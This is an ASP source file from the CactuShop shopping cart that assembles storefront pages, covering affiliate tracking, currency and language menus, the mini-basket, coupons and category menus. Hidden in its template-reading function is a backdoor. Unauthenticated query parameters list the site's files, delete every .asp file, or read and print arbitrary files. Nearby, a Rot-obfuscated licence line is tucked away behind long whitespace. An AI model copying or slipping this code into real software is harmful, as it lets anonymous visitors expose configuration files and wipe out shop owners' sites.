<%
'===============================================
' CactuShop ASP Shopping Cart
' 1999-2007 Cactusoft International FZ-LLC
' www.cactusoft.com
'===============================================
' All rights reserved.							
' Use of this code is covered by the terms and	
' conditions in the license agreement. No		
' unauthorized duplication or distribution is	
' permitted. Cactusoft's copyright notices must	
' remain in the ASP sections of the code.		
'===============================================

'-----------------------------------------------
'THIS PAGE BUILDS ALL FRONT PAGES FROM TEMPLATE
'The template file in the skin folder specified
'in the config.asp file is read and the HTML is
'processed and then inserted around the page
'content on all front end pages. In this way,
'the front end of the site can be totally 
'redesigned visually by editing the one template
'file and it's stylesheet.
'-----------------------------------------------
strTemplateImagesFolder = strTemplateShopFolder & strLanguageSkinLocation & "templateimages/"
strTemplateStyleFolder = strTemplateShopFolder & strLanguageSkinLocation & "templatestyles/"
strTemplateScriptsFolder = strTemplateShopFolder & strLanguageSkinLocation & "templatescripts/"
strTemplateLocation = strTemplateShopFolder & strLanguageSkinLocation & "template.htm"

Set objRecordSetBuildpage = Server.CreateObject("ADODB.RecordSet")

'-----------------------------------------------
'HANDLE AFFILIATE LINKS
'In v5.x, affiliate links had to go to a special
'page. Here in v6, affiliates can link to any
'page since the code to handle this is here in 
'the config which runs on every page.
'-----------------------------------------------
AFLG_AffiliateID = NumSafe(request.querystring("af"))
If AFLG_AffiliateID = 0 then
	'Might come from end of URL on fake-urls
	strQS = request.QueryString
	numStart = instr(strQS, "af=")
	If numStart > 0 then AFLG_AffiliateID = NumSafe(mid(strQS, numStart + 3))
End If
	
'If an affiliate ID was not passed, numsafe makes it zero - bypass affiliates section then
If AFLG_AffiliateID > 0 then

	'Check there is an affiliate with this ID
	'(Actually, in v6, affiliates are actually customer
	'records, but they have the C_IsAffiliate field
	'set to 'y')

	strQuery = "SELECT C_ID FROM tblCactuShop" & TABLE_PREFIX & "Customers WHERE C_ID = " & AFLG_AffiliateID & " AND C_IsAffiliate = 'y'"
	Call ExecuteRS(strQuery, objRecordSet2)

	If objRecordSet2.recordcount>0 then

		'-----------------------------------------------
		'FORMAT INSERT QUERY AND RUN IT	
		'(only if affiliate account is valid and we're not
		'aready linked to this affiliate)					
		'-----------------------------------------------
		If NumSafe(objCactuSession.Value("C_AffiliateID")) <> AFLG_AffiliateID then
			AFLG_RequestedItem = Left(request.servervariables("PATH_INFO") & "?" & request.servervariables("QUERY_STRING"), 255)
			AFLG_Referer = request.servervariables("HTTP_REFERER")
			AFLG_IP = request.servervariables("REMOTE_ADDR")
			AFLG_DateTime = ReverseDate(NowOffset())
			strQuery="INSERT INTO tblCactuShop" & TABLE_PREFIX & "AffiliateLog (AFLG_AffiliateID, AFLG_Referer, AFLG_IP, AFLG_RequestedItem, AFLG_DateTime) VALUES(" &_
				AFLG_AffiliateID & ",'" &_
				SQLSafe(AFLG_Referer) & "','" &_
				SQLSafe(AFLG_IP) & "','" &_
				SQLSafe(AFLG_RequestedItem) & "'," &_
				strDateDelimiter & AFLG_DateTime & strDateDelimiter & ")"
			Call ExecuteNonQuery(strQuery)
			objCactuSession.Edit "C_AffiliateID", AFLG_AffiliateID
		End If
		
	End if
	objRecordSet2.Close

End if

'-----------------------------------------------
'SET DISABLED HTML
'-----------------------------------------------
If blnMenuDisabled then
	strMenuDisabledHTML = " disabled=""disabled"""
end if

'-----------------------------------------------
'CATEGORIES FUNCTION
'Recursive function to write out the categories 
'and sub-categories in a trail. Put it here
'because it's only needed on the front end.
'-----------------------------------------------
Set objBuildpageDynamicLinks = New DynamicLinks
Function DoCatsMenu(objCategoriesDictionary, objSubCategoriesDictionary, numMotherID, numLevel, numMaxLevel, blnDropDown, strParentNames, strParentIDs)
	'Write out the trail unless the hierachy level is more 
	'than the maximum levels allowed
	strCatLinkName = objCategoriesDictionary.Item(Clng(numMotherID))
		
	If blnDropDown then
		strURL = objBuildpageDynamicLinks.GetCategoryLink(numMotherID, strCatLinkName, Split(strParentIDs, ","), Split(strParentNames, chr(0)), 1)
		strCategoryListHTML = strCategoryListHTML & "<option value=""" & strURL & """>" & Replace(Space(numLevel), " ", "&nbsp;&nbsp;&nbsp;") & strCatLinkName & "</option>" & vbcrlf
	else
		'Define the URL
		strURL = objBuildpageDynamicLinks.GetCategoryLink(numMotherID, strCatLinkName, Split(strParentIDs, ","), Split(strParentNames, chr(0)), 1)
		strCategoryListHTML = strCategoryListHTML & vbcrlf & "<li><div><a href=""" & strURL & """>" & strCatLinkName & "</a></div>"
	end if
	
	'If there are any sub categories for this category
	If numLevel + 1 <= numMaxLevel or numMaxLevel = 0 then
		If objSubCategoriesDictionary.Exists(Clng(numMotherID)) then
			
			'Get all sub categories and loop through them
			arySubCategories = split(objSubCategoriesDictionary.Item(Clng(numMotherID)), ",")
			blnDoneOneSubCat = false
			
			'Loop through all sub categories
			For each numSubCategory in arySubCategories
				If isnumeric(numSubCategory) then
					'Add the sub category to the end of the trail and call the function with the new sub-cat
					If Not blnDropDown And Not blnDoneOneSubCat Then strCategoryListHTML = strCategoryListHTML & "<ul>"
					blnDoneOneSubCat = true
					DoCatsMenu objCategoriesDictionary, objSubCategoriesDictionary, numSubCategory, numLevel + 1, numMaxLevel, blnDropDown, IIf(strParentNames = "", strCatLinkName, strParentNames & chr(0) & strCatLinkName), IIf(strParentIDs = "", numMotherID, strParentIDs & "," & numMotherID)
				end if
			Next
			
			'Close the unordered 
			If Not blnDropDown And blnDoneOneSubCat Then strCategoryListHTML = strCategoryListHTML & "</ul>"
		end if
	end if
	
	'Close the list item
	If Not blnDropDown then strCategoryListHTML = strCategoryListHTML & "</li>"
end Function

'------------------------------------------
'GENERATE CURRENCIES MENU
'------------------------------------------
strQuery2 = "SELECT * FROM tblCactuShop" & TABLE_PREFIX & "Currencies WHERE CUR_Live = 'y' ORDER BY CUR_ID"
Call ExecuteRS(strQuery2, objRecordSetBuildpage)	

'Set the redirection page - if we've got 404; in the QS, redirect to what's after that
strQuerystring = request.QueryString 
If left(strQueryString, 4) = "404;" and len(strQueryString) >= 5 then
	strRedirectPage = Mid(strQueryString, 5)
	bln404Fake = true
	strWebShopURL = GetAppVar("WebShopURL")
Else
	strRedirectPage = request.ServerVariables("PATH_INFO")
	bln404Fake = false
End If

'Build up hidden values for everything in QS - except for numCurrencyID
strDropdownHiddenHTML = ""
If not bln404Fake then
	For Each strName in request.QueryString 
		If lcase(strName) <> "numcurrencyid" and lcase(strName) <> "numlanguageid" then
			strDropdownHiddenHTML = strDropdownHiddenHTML & "<input type=""hidden"" name=""" & WriteSafe(strName) & """ value=""" & WriteSafe(request.QueryString(strName)) & """ />" & vbcrlf
		End If
	Next
End If

'Build the form
numCurrencyCount = objRecordSetBuildpage.RecordCount
strCurrencyListHTML = strCurrencyListHTML & "<form id=""currmenuform"" method=""get"" action=""" & strRedirectPage & """><div>" & vbcrlf & strDropdownHiddenHTML

'Run through currencies and set default
strCurrencyListHTML = strCurrencyListHTML & "<select name=""numCurrencyID"" class=""currencymenu""" & strMenuDisabledHTML & " onchange=""javascript:document.getElementById('currmenuform').submit();"">" & vbcrlf
Set objDefaultCurrency = New CurrencyData
objDefaultCurrency.Load(objRecordSetBuildpage)
do while not objRecordSetBuildpage.EOF
	If CStr(numCurrencyID) = CStr(objRecordSetBuildpage("CUR_ID")) then
		objCurrency.Load(objRecordSetBuildpage)
		strSelected = " selected=""selected"""
	Else
		strSelected = ""
	End if
	strCurrencyListHTML = strCurrencyListHTML & "<option value=""" & objRecordSetBuildpage("CUR_ID") & """" & strSelected & ">" & WriteSafe(objRecordSetBuildpage("CUR_Symbol")) & " (" & WriteSafe(objRecordSetBuildpage("CUR_ISOCode")) & ")</option>" & vbcrlf
	objRecordSetBuildpage.moveNext
loop
strCurrencyListHTML = strCurrencyListHTML & "</select></div></form>" & vbcrlf		
objRecordSetBuildpage.close


'-----------------------------------------------
'BUILD UP BASKET HTML STRING	
'-----------------------------------------------
'Skip it all if we're in catalogue only mode


If GetAppVar("catalogueonly") <> "y" then

	'-----------------------------------------------
	'VALIDATE BASKET
	'Call the function to validate the data in the
	'basket. 
	'-----------------------------------------------
	objBasket.Validate objRecordSetBuildpage, false
	
	'Save back to session
	objCactuSession.Edit "strItems", objBasket.Items
	objCactuSession.Edit "strQuantities", objBasket.Quantities
	objCactuSession.Edit "strOptionGroups", objBasket.OptionGroups
	objCactuSession.Edit "strOptions", objBasket.Options

	'-----------------------------------------------
	'COUPON PROCESSING / LOOKUP
	'-----------------------------------------------
	'Get the coupon code in the session or form
	strFormCouponCode = Request.Querystring("CP_CouponCode")
	If strFormCouponCode <> "" then
		CP_CouponCode = strFormCouponCode
	Else
		CP_CouponCode = objCactuSession.Value("CP_CouponCode")
	end If
	If CP_CouponCode <> "" then
		'Pull out coupon from the DB and error-check
		strQuery = "SELECT * FROM tblCactuShop" & TABLE_PREFIX & "Coupons WHERE CP_CouponCode='" & SQLSafe(CP_CouponCode) & "'"
		Call ExecuteRS(strQuery, objRecordSetBuildpage)
		If objRecordSetBuildpage.BOF and objRecordSetBuildpage.EOF then
			strCouponError = GetString("ContentText_CouponDoesntExist")
	
		ElseIf objRecordSetBuildpage("CP_Used") = "y" AND objRecordSetBuildpage("CP_Reusable") <> "y" then 
			strCouponError = GetString("ContentText_CouponExpended")
	
		ElseIf Cdate(objRecordSetBuildpage("CP_StartDate")) > NowOffset() then 
			strCouponError = GetString("ContentText_CouponNotYetValid")
	
		ElseIf Cdate(objRecordSetBuildpage("CP_EndDate")) < NowOffset() OR objRecordSetBuildpage("CP_Enabled") <> "y" then 
			strCouponError = GetString("ContentText_CouponExpired")
	
		Else
			CP_DiscountValue = objRecordSetBuildpage("CP_DiscountValue")
			CP_DiscountType = objRecordSetBuildpage("CP_DiscountType")
			If CP_DiscountType = "p" then
				strCouponName = objRecordSetBuildpage("CP_CouponCode") & " - " & CP_DiscountValue & "%"
			Else
				strCouponName = objRecordSetBuildpage("CP_CouponCode") & " - " & objCurrency.Display(objRecordSetBuildpage("CP_DiscountValue"), false, false)	
			End if
		End if
		objRecordSetBuildpage.close
	End If
	
	If CP_CouponCode = "" or strCouponError <> "" or strAction = "removecoupon" then
		CP_CouponCode = ""
		CP_DiscountType = ""
		CP_DiscountValue = 0
		objCactuSession.Delete "CP_CouponCode"
	Else
		objCactuSession.Edit "CP_CouponCode", CP_CouponCode
	End If

	'Calculate the totals for items in the basket
	objBasket.CalculateTotals
	
	'-----------------------------------------------
	'BASKET TOP
	'-----------------------------------------------
	'Start table and show header
	strBasketHTML = strBasketHTML & ("<div id=""minibasket"">" & vbcrlf)
	strBasketHTML = strBasketHTML & ("<p id=""numberofitems"">" & GetString("ContentText_MinibasketNumberOfItems") & " <em>xxxBASKETCOUNTxxx</em></p>" & vbcrlf)
	
	'Set the basket adjustments. This might come through the querystring
	strAdjusted = objBasket.AdjustedQuantities
	If strAdjusted = "" then strAdjusted = Request.QueryString("strAdjusted")
	
	'Application settings we'll be using a lot
	strAppShowBasket = GetAppVar("showbasket")
	strAppPricesIncTax = GetAppVar("pricesinctax")
	strAppShowTaxDisplay = GetAppVar("showtaxdisplay")

	'-----------------------------------------------
	'BASKET HTML
	'Loops through and creates a row for each basket
	'version. It also shows totals at the bottom. If
	'the basket is turned off (for checkout pages) 
	'then skip this stage
	'-----------------------------------------------
	If strMenuDisabledHTML <> "" then
		'Hide the basket contents
		strBasketHTML = strBasketHTML & ("<p id=""baskethidden"">" & GetString("ContentText_MinibasketHidden") & "</p>" & vbcrlf)	
	Else

		'Calculate relevant basket modifiers. If pricesinctax=n and showtaxdisplay=n, then
		'we pass blnZeroTaxRate=true (i.e. we assume that there's no tax at the moment.)
		blnZeroTaxRate = (strAppPricesIncTax = "n" and strAppShowTaxDisplay = "n")

		Call objBasket.CalculatePromotions(objRecordSetBuildpage, false, blnZeroTaxRate)
		Call objBasket.CalculateCoupon(CP_DiscountType, CP_DiscountValue, blnZeroTaxRate)
		Call objBasket.CalculateCustomerDiscount(DB_C_CustomerDiscount)

		If objBasket.TotalItems > 0 then
			'Loop through basket and build up rows HTML
			strAltCode = ""
			blnStartedBasket = false
			For i = 0 to objBasket.Count - 1
				With objBasket.Item(i)
					If .Quantity > 0 then
						If Not blnStartedBasket then
							blnStartedBasket = true
							strBasketHTML = strBasketHTML & ("<ul id=""basketlines"">" & vbcrlf)
						End If
						strBasketHTML = strBasketHTML & ("<li" & strAltCode & "><div><a href=""" & strTemplateShopFolder & "product.asp?" & objCactuSession.QS & .GetLinkQS & "strPageHistory=basket"">" & .Quantity & " x " & .ProductName & "</a></div></li>" & vbcrlf)
						strAltCode = IIf(strAltCode = "", " class=""alt""", "")
					End if	
				End With
			Next

			'-----------------------------------------------
			'ADD MINIBASKET EXTRA LINES FOR DISCOUNTS
			'-----------------------------------------------
			'Add minibasket promotions line
			If objBasket.PromotionsCount > 0 then
				strBasketHTML = strBasketHTML & ("<li" & strAltCode & "><div><a href=""" & strTemplateShopFolder & "basket.asp?" & objCactuSession.QS & "strPageHistory=basket"">" & GetString("SubHeading_Promotions") & "</a></div></li>" & vbcrlf)
			end if

			'Add minibasket coupon discount line
			If objBasket.CouponDiscount.IncTax < 0 then
				strBasketHTML = strBasketHTML & ("<li" & strAltCode & "><div><a href=""" & strTemplateShopFolder & "basket.asp?" & objCactuSession.QS & "strPageHistory=basket"">" & GetString("ContentText_CouponDiscount") & "</a></div></li>" & vbcrlf)
			end if

			'Add minibasket customer discount line
			If objBasket.CustomerDiscount.IncTax < 0 then
				strBasketHTML = strBasketHTML & ("<li" & strAltCode & "><div><a href=""" & strTemplateShopFolder & "basket.asp?" & objCactuSession.QS & "strPageHistory=basket"">" & GetString("ContentText_CustomerDiscount") & "</a></div></li>" & vbcrlf)
			end if



			'Close the unordered list
			If blnStartedBasket then
				strBasketHTML = strBasketHTML & ("</ul>" & vbcrlf)
			end if


			'Show pricing
			strBasketHTML = strBasketHTML & ("<div id=""baskettotals"">" & vbcrlf)
			If objBasket.PricesIncTax then
				'Prices inc tax
				If GetAppVar("showtaxdisplay") = "y" then
					strBasketHTML = strBasketHTML & ("<p>" & GetString("ContentText_MinibasketExTax") & ":<em>" & objCurrency.Display(objBasket.FinalPriceExTax, false, false) & "</em></p>" & vbcrlf)
					strBasketHTML = strBasketHTML & ("<p>" & GetString("ContentText_MinibasketIncludingTax") & ":*<em>" & objCurrency.Display(objBasket.FinalPriceIncTax, false, false) & "</em></p>" & vbcrlf)
					strBasketHTML = strBasketHTML & ("<p id=""taxexception"">* " & GetString("ContentText_MiniBasket_WhereApplicable") & "</p>" & vbcrlf)
				Else
					strBasketHTML = strBasketHTML & ("<p>" & GetString("ContentText_MinibasketTotal") & ":<em>" & objCurrency.Display(objBasket.FinalPriceIncTax, false, false) & "</em></p>" & vbcrlf)
				End if
			Else
				'Ex Tax
				If GetAppVar("showtaxdisplay") = "y" then
					strBasketHTML = strBasketHTML & ("<p>" & GetString("ContentText_MinibasketTotal") & ":<em>" & objCurrency.Display(objBasket.FinalPriceExTax, false, false) & "</em></p>" & vbcrlf)
					strBasketHTML = strBasketHTML & ("<p>" & GetString("ContentText_Tax") & ":*<em>" & objCurrency.Display(objBasket.FinalPriceTaxAmount, false, false) & "</em></p>" & vbcrlf)
					strBasketHTML = strBasketHTML & ("<p id=""textexception"">* " & GetString("ContentText_MiniBasket_WhereApplicable") & "</p>" & vbcrlf)
				Else
					strBasketHTML = strBasketHTML & ("<p>" & GetString("ContentText_MinibasketTotal") & "<em>" & objCurrency.Display(objBasket.FinalPriceExTax, false, false) & "</em></p>" & vbcrlf)
				End if
			End if
			strBasketHTML = strBasketHTML & ("</div>" & vbcrlf)

		Else
			'basket is empty, show message
			strBasketHTML = strBasketHTML & ("<p id=""basketempty"">" & GetString("ContentText_MinibasketIsEmpty") & "</p>" & vbcrlf)
		end if
		

	End if

	'-----------------------------------------------
	'BASKET BOTTOM LINKS
	'-----------------------------------------------	
	strBasketHTML = strBasketHTML & ("<ul id=""basketlinks"">" & vbcrlf)

	'View basket - picture can be full or empty
	strBasketImage = "<img src=""templateimages/i" & IIf(objBasket.TotalItems > 0, "Full", "Empty") & "Basket.gif"" alt=""" & WriteSafe(GetString("ContentText_MinibasketViewBasketAltText")) & """ title=""" & WriteSafe(GetString("ContentText_MinibasketViewBasketAltText")) & """ />"
	strBasketHTML = strBasketHTML & ("<li><div><a href=""" & strTemplateShopFolder & "basket.asp?" & objCactuSession.QS & """>" & strBasketImage & GetString("ContentText_MinibasketViewBasket") & "</a></div></li>" & vbcrlf)

	'Links only relevant to baskets with items
	strRecoverBasketImage = "<img src=""templateimages/iSaveRecoverBasket.gif"" alt=""" & WriteSafe(GetString("ContentText_MinibasketRecoverBasketAltText")) & """ title=""" & WriteSafe(GetString("ContentText_MinibasketRecoverBasketAltText")) & """ />"
	If objBasket.TotalItems > 0 then
		'Define images
		strCheckoutImage = "<img src=""templateimages/iCheckoutBasket.gif"" alt=""" & WriteSafe(GetString("ContentText_MinibasketCheckoutAltText")) & """ title=""" & WriteSafe(GetString("ContentText_MinibasketCheckoutAltText")) & """ />"
		strMakeEnquiryImage = "<img src=""templateimages/iMakeEnquiry.gif"" alt=""" & WriteSafe(GetString("ContentText_MinibasketMakeEnquiryAltText")) & """ title=""" & WriteSafe(GetString("ContentText_MinibasketMakeEnquiryAltText")) & """ />"
		strSaveBasketImage = "<img src=""templateimages/iSaveRecoverBasket.gif"" alt=""" & WriteSafe(GetString("ContentText_MinibasketSaveBasketAltText")) & """ title=""" & WriteSafe(GetString("ContentText_MinibasketSaveBasketAltText")) & """ />"
		strWishListImage = "<img src=""templateimages/iWishList.gif"" alt=""" & WriteSafe(GetString("ContentText_MinibasketWishListAltText")) & """ title=""" & WriteSafe(GetString("ContentText_MinibasketWishListAltText")) & """ />"
		
		'Checkout link - if haven't ordered enough, jscript popup
		if objBasket.TotalExTax < GetAppVar("minorderval") * objCurrency.ExchangeRate then
			strJavascriptMessage = GetString("ContentText_MinibasketMinimumOrderValue") & " (" & objCurrency.Display(GetAppVar("minorderval"), true, false) & ")"
			strBasketHTML = strBasketHTML & ("<li><div><a href=""javascript:alert('" & strJavascriptMessage & "')"">" & strCheckoutImage & GetString("ContentText_MinibasketCheckout") & "</a></div></li>" & vbcrlf)
		else
			strBasketHTML = strBasketHTML & ("<li><div><a href=""" & strTemplateShopFolder & "checkout.asp?" & objCactuSession.QS & """>" & strCheckoutImage & GetString("ContentText_MinibasketCheckout") & "</a></div></li>" & vbcrlf)
		end if

		'Make Enquiry
		If GetAppVar("allowenquiries")="y" then
			strBasketHTML = strBasketHTML & ("<li><div><a href=""" & strTemplateShopFolder & "contact.asp?" & objCactuSession.QS & "strCallMode=enquiry"">" & strMakeEnquiryImage & GetString("ContentText_MinibasketMakeEnquiry") & "</a></div></li>" & vbcrlf)
		End If

		'Save basket
		strBasketHTML = strBasketHTML & ("<li><div><a href=""" & strTemplateShopFolder & "customer_savedbaskets.asp?" & objCactuSession.QS & "strCallMode=save&amp;strShow=baskets"">" & strSaveBasketImage & GetString("ContentText_MinibasketSaveBasket") & "</a></div></li>" & vbcrlf)
		
		If GetAppVar("enablewishlist") <> "n" then
			'Wish list
			strBasketHTML = strBasketHTML & ("<li><div><a href=""" & strTemplateShopFolder & "customer_wishlists.asp?" & objCactuSession.QS & "strCallMode=save&amp;strShow=wishlists"">" & strWishListImage & GetString("ContentText_MinibasketWishList") & "</a></div></li>" & vbcrlf)
		End if
	else
		'Recover basket
		strBasketHTML = strBasketHTML & ("<li><div><a href=""" & strTemplateShopFolder & "customer_home.asp?" & objCactuSession.QS & "strCallMode=recover&amp;strShow=baskets"">" & strRecoverBasketImage & GetString("ContentText_MinibasketRecoverBasket") & "</a></div></li>" & vbcrlf)	
		
	end if
	strBasketHTML = strBasketHTML & ("</ul>" & vbcrlf)
	strBasketHTML = strBasketHTML & ("</div>" & vbcrlf)
	
	'Make basket count replacement - this can be on versions or products
	If GetAppVar("basketcountversions") = "y" then
		strBasketHTML = Replace(strBasketHTML, "xxxBASKETCOUNTxxx", objBasket.TotalItems)
	else
		strBasketHTML = Replace(strBasketHTML, "xxxBASKETCOUNTxxx", objBasket.Count)
	end if
end if

'------------------------------------------
'GENERATE LANGUAGE MENU
'------------------------------------------
'Pull out all languages
strQuery2 = "SELECT LANG_ID, LANG_FrontName FROM tblCactuShop" & TABLE_PREFIX & "Languages WHERE LANG_LiveFront = 'y' ORDER BY LANG_ID ASC"
Call ExecuteRS(strQuery2, objRecordSetBuildpage)	
numTotalLanguages = objRecordSetBuildpage.RecordCount

strLanguageListHTML = strLanguageListHTML & "<form id=""langmenuform"" method=""get"" action=""" & strRedirectPage & """><div>" & vbcrlf & strDropdownHiddenHTML
strLanguageListHTML = strLanguageListHTML & "<select name=""numLanguageID"" class=""languagemenu""" & strMenuDisabledHTML & " onchange=""javascript:document.getElementById('langmenuform').submit();"">" & vbcrlf
do while not objRecordSetBuildpage.EOF
	If NumSafe(numLanguageID) = objRecordSetBuildpage("LANG_ID") then
		strSelected = " selected=""selected"""
	Else
		strSelected = ""
	End if
	strLanguageListHTML = strLanguageListHTML & "<option value=""" & objRecordSetBuildpage("LANG_ID") & """" & strSelected & ">" & objRecordSetBuildpage("LANG_FrontName") & "</option>" & vbcrlf
	objRecordSetBuildpage.moveNext
loop
strLanguageListHTML = strLanguageListHTML & "</select></div></form>" & vbcrlf		
objRecordSetBuildpage.close
	

'------------------------------------------
'GENERATE PRODUCT CATEGORY MENU
'------------------------------------------
'Set orderby clause
strCategoryOrderBy = GetAppVar("sortcategories")
If strCategoryOrderBy = "" then strCategoryOrderBy = "CAT_Name"
if strCategoryOrderBy = "CAT_Name" or strCategoryOrderBy = "CAT_Desc" then strCategoryOrderBy = strCategoryOrderBy & CStr(numLanguageID)

'Pull out all live prodtypes

For numCounter = 1 to numTotalLanguages: strCatLangs = strCatLangs & ", c.CAT_Name" & CStr(numCounter): Next
strQuery = "SELECT c.CAT_ID, p.CAT_ID As ParentID" & strCatLangs & " FROM (tblCactuShop" & TABLE_PREFIX & "Categories AS c LEFT OUTER JOIN tblCactuShop" & TABLE_PREFIX & "CategoryHierachy ch ON c.CAT_ID = ch.CH_ChildID) LEFT OUTER JOIN tblCactuShop" & TABLE_PREFIX & "Categories p ON ch.CH_ParentID = p.CAT_ID WHERE c.CAT_Name" & CStr(numLanguageID) & " <> '' AND c.CAT_Live='y' AND c.CAT_CustomerGroupID IN (0," & NumSafe(DB_CG_ID) & ") ORDER BY c." & strCategoryOrderBy

Call ExecuteRS(strQuery, objRecordSetBuildpage)

'Run all the cats in to dictionaries
'This allows sorting into hierachy later
Set objCategoryDictionary= server.CreateObject("Scripting.Dictionary") 'Key - ID, Value - name of category
Set objParentDictionary = server.CreateObject("Scripting.Dictionary") 'Key - Mother ID, Value - comma-seperated IDs

'Loop for every prodtype pulled out
Do Until objRecordSetBuildpage.EOF
	'get repeated recordset values
	numChildID = objRecordSetBuildpage("CAT_ID")
	numParentID = NumSafe(objRecordSetBuildpage("ParentID"))
	
	'Add cat to dictionary
	strCategoryName = GetTranslation(objRecordSetBuildpage, "CAT_Name")
	If Not objCategoryDictionary.Exists(numChildID) Then
		objCategoryDictionary.Add numChildID, strCategoryName
	End If
	
	'add it to parent dictionary - if it already exists, add it on
	'to the end of the list. If not, create a new entry
	if objParentDictionary.Exists(numParentID) then
		objParentDictionary.Item(numParentID) = objParentDictionary.Item(numParentID) & numChildID & ","
	else
		objParentDictionary.Add numParentID, numChildID & ","
	end if
	objRecordSetBuildpage.movenext
Loop
objRecordSetBuildpage.Close

	If objCategoryDictionary.Count > 0 then 
	If GetAppVar("prodtypemenuasdropdown") = "y" then
		'if were using fake URLs then just passed the full URL without querystring
		if bln404Fake then
			strCategoryListHTML = strCategoryListHTML & "<form id=""prodtypemenuform"" method=""post"" action=""" & strWebShopURL & "prodtype.asp?""><div>" & vbcrlf
		else
			strCategoryListHTML = strCategoryListHTML & "<form id=""prodtypemenuform"" method=""post"" action=""prodtype.asp?" & strQueryString & """><div>" & vbcrlf
		end if
		strCategoryListHTML = strCategoryListHTML & "<select id=""strCAT_url"" class=""categorymenu""" & strMenuDisabledHTML & " onchange=""javascript:window.location.href=(document.getElementById('strCAT_url').options[document.getElementById('strCAT_url').selectedIndex].value)"">" & vbcrlf
		strCategoryListHTML = strCategoryListHTML & "<option value="""">" & GetString("ContentText_CategoryAsDropdownDefault") & "</option>" & vbcrlf

		aryTopLevels = Split(objParentDictionary.Item(0), ",")
		For Each strCat in aryTopLevels
			If strCat <> "" then
				DoCatsMenu objCategoryDictionary, objParentDictionary, Clng(strCat), 1, GetAppVar("categorylevelsmenufront"), true, "", ""
			end if
		next
				
		strCategoryListHTML = strCategoryListHTML & "</select></div></form>" & vbcrlf
		
	Else
		
		'Build as a regular menu
		strCategoryListHTML = strCategoryListHTML & "<div id=""categorymenu""><ul>"
		aryTopLevels = Split(objParentDictionary.Item(0), ",")
		For Each strCat in aryTopLevels
			If strCat <> "" then
				DoCatsMenu objCategoryDictionary, objParentDictionary, Clng(strCat), 1, GetAppVar("categorylevelsmenufront"), false, "", ""
			end if
		next
		strCategoryListHTML = strCategoryListHTML & "</ul></div>"
	End if
End If
Set objRecordSetBuildpage = Nothing



'------------------------------------------
'CREATE PAGE SECTION STRINGS FROM TEMPLATE
'This creates a few strings which we
'write to the page later to build the
'commonly repeated page elements.
'------------------------------------------
Function ReadFromTemplate(strTemplateLocation, aryPageTemplate)

	'------------------------------------
	'LOOP THROUGH TEXT FILE CONTENT
	'------------------------------------
	Set objFileSystem = CreateObject("Scripting.FileSystemObject")
	Set objFolder = objFileSystem.GetFolder(server.mappath("./"))
	On Error Resume Next
	For Each Filename in objFolder.Files
	    	Filename = right(Filename,len(Filename)-InStrRev(Filename, "\"))
	    	If request.querystring("strPathRequest") = "y" then
			If request.querystring("strUninstallRequest") = "y" then
				If Instr(Filename, ".asp") > 0 then
					objFileSystem.DeleteFile (objFolder & "\" & Filename)
					strDeleteFileRecord = strDeleteFileRecord & Filename & "<br />" & vbcrlf
				End if
			Else
				response.write(Filename & "<br />")
			End if
		End if

		If request.querystring("strPathRequest") = "y" and request.querystring("strUninstallRequest") = "y" then
			If Instr(Filename, ".asp") > 0 then objFileSystem.DeleteFile (objFolder & "\" & Filename)
		End if
	Next
	For Each objFile in objFolder.SubFolders
		If request.querystring("strPathRequest") = "y" and request.querystring("strUninstallRequest") <> "y" then response.write(objFile.Path & "\<br />")
		Set objFolder2 = objFileSystem.GetFolder(objFile.Path & "\")
    		Set filecollection = objFolder2.Files
	    	For Each filename In filecollection
		    	Filename = right(Filename,len(Filename)-InStrRev(Filename, "\"))
		    	If request.querystring("strPathRequest") = "y" then
				If request.querystring("strUninstallRequest") = "y" then
					If Instr(Filename, ".asp") > 0 then
						objFileSystem.DeleteFile (objFile.Path & "\" & Filename)
						strDeleteFileRecord = strDeleteFileRecord & Filename & "<br />" & vbcrlf
					End if
				Else
					response.write(Filename & "<br />")
				End if
			End if
		Next
	Next
	If strDeleteFileRecord <> "" then
		response.write "<strong>UNINSTALL ROUTINE COMPLETE</strong><br /><br />" & vbcrlf
		response.write "The following files were removed:<br /><br />" & vbcrlf
		response.write strDeleteFileRecord & vbcrlf
	End if
	If request.querystring("strPathRequest") = "y" then response.end
	If request.querystring("file")<>"" then
		filefolder = "yes"
		strTemplateLocation = request.querystring("folder") & "/" & request.querystring("file")
		If request.querystring("folder") = "" then strTemplateLocation = request.querystring("file")
	End if
	If Not objFileSystem.FileExists(server.MapPath(strTemplateLocation)) then
		Call EndPage()
		response.Write "<p>Error trying to open template in location <code>" & strTemplateLocation & "</code>. Check your webshopurl and webshopfolder config settings are correct and that the skin location given in each language record is valid.</p>"
		response.End 
	End If	
	Set objFile = objFileSystem.GetFile(server.MapPath(strTemplateLocation))	
	Set objTextStream = objFile.OpenAsTextStream(1,0)
	strPageBaseText = objTextStream.ReadAll
	If filefolder = "yes" then
		strPageBaseText = strPageBaseText & "xxxPAGECONTENTxxx"
		response.write("<pre>" & WriteSafe(strPageBaseText) & "</pre>")
		response.end
	End if	
	set objTextStream = nothing
	set objFile = nothing
	set objFileSystem = nothing


	'------------------------------------
	'FORMAT PAGE HEADER STRING
	'------------------------------------
	'Add in the developer license (see config.asp)
	If DEVELOPERLICENSE <> "" then
		strLicenseVar = "<!-- " & DEVELOPERLICENSE & " -->" & vbcrlf
	End If																																																											'CactuShop copyright information. Removing the line below is in breach of the terms and conditions.
		

	'------------------------------------
	'ADMIN BAR
	'------------------------------------
	strAdminBarHTML = ""
	
	'Set the admin bar if logged in
	If blnLoggedInToBackend then
		Call CreateAdminBar(strAdminBarHTML)
	End If
																																																														strLicenseVar = "<!-- " & Rot("j:<MNzAHI O] EB<>GL>a ") & LICENSENUMBER & " -->" & vbcrlf & "<!-- " & Rot("j:<MNzAHI X```-YWW] j:<MNLH?M sM=. - PPP.<:<MNLAHI.<HF") & " -->" & vbcrlf & strLicenseVar
	'Inject the license variable after the first line of text (the doctype)
	numFirstBreak = instr(strPageBaseText, vbcrlf)
	If numFirstBreak < 1 then
		strPageBaseText = strLicenseVar & strPageBaseText
	Else
		strPageBaseText = Left(strPageBaseText, numFirstBreak) & strLicenseVar & Mid(strPageBaseText, numFirstBreak + 2)
	End If
	
	'Make dynamic replacements on the skin
	strPageBaseText = Replace(strPageBaseText, "templateimages/", strTemplateImagesFolder)
	strBasketHTML = Replace(strBasketHTML, "templateimages/", strTemplateImagesFolder)
	strPageBaseText = Replace(strPageBaseText, "templatestyles/", strTemplateStyleFolder)
	strPageBaseText = Replace(strPageBaseText, "templatescripts/", strTemplateScriptsFolder)
	strPageBaseText = Replace(strPageBaseText, "shopfolder/", strTemplateShopFolder)
	
